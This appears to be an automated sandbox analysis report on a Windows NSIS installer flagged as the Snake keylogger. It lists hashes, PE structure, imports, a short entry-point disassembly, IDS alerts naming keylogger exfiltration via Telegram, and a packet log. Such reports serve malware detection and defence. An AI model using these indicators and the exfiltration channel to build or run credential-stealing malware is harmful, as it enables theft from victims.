                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.141789881872813
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:4NG0guPiKA.exe
                                                                                                          File size:778'465 bytes
                                                                                                          MD5:8f02b3e31021d64ed25a599e58bc8f2f
                                                                                                          SHA1:7bec44b33d33f11de7f626097b70758f60f655f5
                                                                                                          SHA256:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47
                                                                                                          SHA512:d16554484647d2875b0bcf4b84c7726b14cd96725ba562be2f06714d80468367ecbdfd251c20eee5cd0220fba15becc9c53ccd42fe1110699fe2eb43813fb142
                                                                                                          SSDEEP:12288:xlYZmcRHOg1BFC+gpurATKGOCDUYRpRlUcRzhPnxd2ckxkYJLY:UmcdOOBRg00W4YYJlUcR1vxdgxk2LY
                                                                                                          TLSH:98F4D06F1B068446EE9415F2B8A3DE47A1F5BE7C206873452D66FE1790B3F70398E488
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                                          Icon Hash:058cc0e474936126
                                                                                                          Entrypoint:0x40335a
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebx
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000020h
                                                                                                          xor ebp, ebp
                                                                                                          pop esi
                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                          mov dword ptr [esp+10h], 00409230h
                                                                                                          mov dword ptr [esp+1Ch], ebp
                                                                                                          call dword ptr [00407034h]
                                                                                                          push 00008001h
                                                                                                          call dword ptr [004070BCh]
                                                                                                          push ebp
                                                                                                          call dword ptr [004072ACh]
                                                                                                          push 00000008h
                                                                                                          mov dword ptr [00429298h], eax
                                                                                                          call 00007F962CF1ECECh
                                                                                                          mov dword ptr [004291E4h], eax
                                                                                                          push ebp
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebp
                                                                                                          push 00420690h
                                                                                                          call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007F962CF1E957h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F962CF1E945h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007F962CF1BE3Ah
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007F962CF1E396h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007F962CF1BEFEh
push 00000020h
pop edx
cmp cx, dx
jne 00007F962CF1BE39h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F962CF1BE2Bh
add word ptr [eax], 0000h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0x43188 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e68 | 0x6000 | 2f6554958e1a5093777de617d6e0bffc | False | 0.6566162109375 | data | 6.419811957742583 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202d8 | 0x600 | 9587277f9a9b39e2caf86eae07909d87 | False | 0.4733072916666667 | data | 3.757932017065988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x5f000 | 0x43188 | 0x43200 | ad79ab7bc0418c21ba04b90eb50d4a0c | False | 0.18500494646182494 | data | 4.605797713668011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x5f2b0 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x5f618 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.1810552711779152
RT_DIALOG | 0xa1640 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0xa1788 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0xa18c8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xa19c8 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0xa1ae8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xa1bb0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xa1c10 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0xa1c28 | 0x258 | data | English | United States | 0.5216666666666666
RT_MANIFEST | 0xa1e80 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T03:05:23.278926+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49708 | 142.250.181.238 | 443 | TCP
2025-01-11T03:05:28.438391+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49710 | 132.226.8.169 | 80 | TCP
2025-01-11T03:05:35.297783+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49710 | 132.226.8.169 | 80 | TCP
2025-01-11T03:05:35.915509+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49712 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:37.704410+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49712 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:40.844817+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49713 | 132.226.8.169 | 80 | TCP
2025-01-11T03:05:41.443058+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49714 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:41.624698+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49714 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:45.159302+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49716 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:45.406336+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49716 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:51.763518+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49720 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:52.013161+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49720 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:54.618271+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49722 | 149.154.167.220 | 443 | TCP
2025-01-11T03:05:54.865177+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49722 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:02.200710+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49725 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:02.377370+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49725 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:11.751087+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49727 | 132.226.8.169 | 80 | TCP
2025-01-11T03:06:12.354997+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49728 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:12.529577+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49728 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:15.719575+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49730 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:15.965935+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49730 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:17.658282+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49732 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:17.832210+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49732 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:19.289507+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49734 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:19.535991+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49734 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:21.119452+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49736 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:21.431724+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49736 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:22.988605+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49738 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:23.238549+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49738 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:24.736208+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49740 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:24.909136+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49740 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:26.374032+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49742 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:26.624961+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49742 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:28.100460+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49744 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:28.276828+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49744 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:29.820597+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49746 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:29.999996+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49746 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:31.576717+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49748 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:31.750830+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49748 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:33.254475+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49750 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:33.431948+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49750 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:34.901388+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49752 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:35.151286+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49752 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:36.703013+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49754 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:36.876519+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49754 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:38.859785+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49756 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:39.032361+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49756 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:40.493302+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49758 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:40.757522+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49758 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:42.236480+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49760 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:42.413636+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49760 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:43.906128+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49762 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:44.177514+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49762 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:46.671836+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49764 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:46.849067+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49764 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:48.612707+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49766 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:48.866226+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49766 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:50.439435+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49768 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:50.701288+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49768 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:52.156184+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49770 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:52.402052+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49770 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:53.871628+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49772 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:54.047819+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49772 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:55.817470+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49774 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:55.991776+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49774 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:57.463427+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49776 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:57.713812+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49776 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:59.268236+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49778 | 149.154.167.220 | 443 | TCP
2025-01-11T03:06:59.524787+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49778 | 149.154.167.220 | 443 | TCP
2025-01-11T03:07:01.199872+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49780 | 149.154.167.220 | 443 | TCP
2025-01-11T03:07:01.457769+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49780 | 149.154.167.220 | 443 | TCP
2025-01-11T03:07:02.957766+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.10 | 49782 | 149.154.167.220 | 443 | TCP
2025-01-11T03:07:03.214933+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.10 | 49782 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:05:21.914495945 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:21.914539099 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:21.914678097 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:21.937899113 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:21.937925100 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:22.592200994 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:22.592303991 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:22.592988968 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:22.593034983 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:22.983067036 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:22.983093977 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:22.984098911 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:22.987194061 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:22.989475012 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:23.031328917 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:23.278932095 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:23.279117107 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:23.279133081 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:23.279220104 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:23.279264927 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:23.279299974 CET | 443 | 49708 | 142.250.181.238 | 192.168.2.10
Jan 11, 2025 03:05:23.279350042 CET | 49708 | 443 | 192.168.2.10 | 142.250.181.238
Jan 11, 2025 03:05:23.309701920 CET | 49709 | 443 | 192.168.2.10 | 142.250.186.33
Jan 11, 2025 03:05:23.309729099 CET | 443 | 49709 | 142.250.186.33 | 192.168.2.10
Jan 11, 2025 03:05:23.309799910 CET | 49709 | 443 | 192.168.2.10 | 142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.310409069 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.310424089 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.953073978 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.953198910 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.957209110 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.957217932 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.957528114 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.957597971 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.957986116 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.999335051 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.667594910 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.667813063 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.673283100 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.673810005 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.685863018 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.685924053 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.685941935 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.685997963 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.691878080 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.691986084 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.755505085 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.755595922 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.755615950 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.755678892 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.755685091 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.755827904 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.756572008 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.756663084 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.756666899 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.756833076 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.763134956 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.763204098 CET49709443192.168.2.10142.250.186.33
